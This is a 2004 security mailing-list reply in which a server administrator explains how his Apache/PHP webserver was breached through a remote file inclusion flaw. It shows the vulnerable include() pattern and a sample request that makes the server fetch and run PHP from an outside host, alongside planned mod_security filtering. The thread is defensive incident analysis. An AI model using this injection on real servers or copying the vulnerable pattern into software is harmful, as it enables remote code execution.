Security Incidents mailing list archives
Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)
From: "nathan c. dickerson" <nathan () pro net>
Date: Tue, 13 Jul 2004 16:31:07 -0700
Greetings!Thanks for the reply. I am abit relieved to say I've found the point of entry via an include() injection.
The code was: include($PAGE.".php"); On one of the custom scripts on the server.Since remote fopen and register globals was enabled, this was injectable via passing:
index.php?page=http://remote.server.com/exploit which expands to include("http://remote.server.com/exploit.php")If the remote server served the php file as plain text, the script would be included and executed. It doesn't leave any useful logs either. I've now got to find away to disable remote file includes, while keeping the remote fopen functionality, which is required by some of the scripts on the server.
Definitly going to get mod_security logging any php requests with "://" in the get, post, or even cookie.
Thanks for the replies Nathan Dmitry Alyabyev wrote:
On Saturday 10 July 2004 04:40, Tim Greer wrote: [skip]Sounds like one of the many PHP scripts is exploitable. You could run PHP as CGI w/ the suexec wrapper (and even tweak the source or use an existing patch so PHP scripts don't need to be modified at all (other than the ownership of some files/dirs PHP scripts need to use/write to).not really - you will lose authentication within PHP scripts in meaning of receiving password via environment and some add-ons like Zend optimizer will stop working
Current thread:
- Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 09)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Dmitry Alyabyev (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 13)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Dmitry Alyabyev (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Frank Knobbe (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 13)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Frank Knobbe (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 13)
- RE: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Bojan Zdrnja (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 12)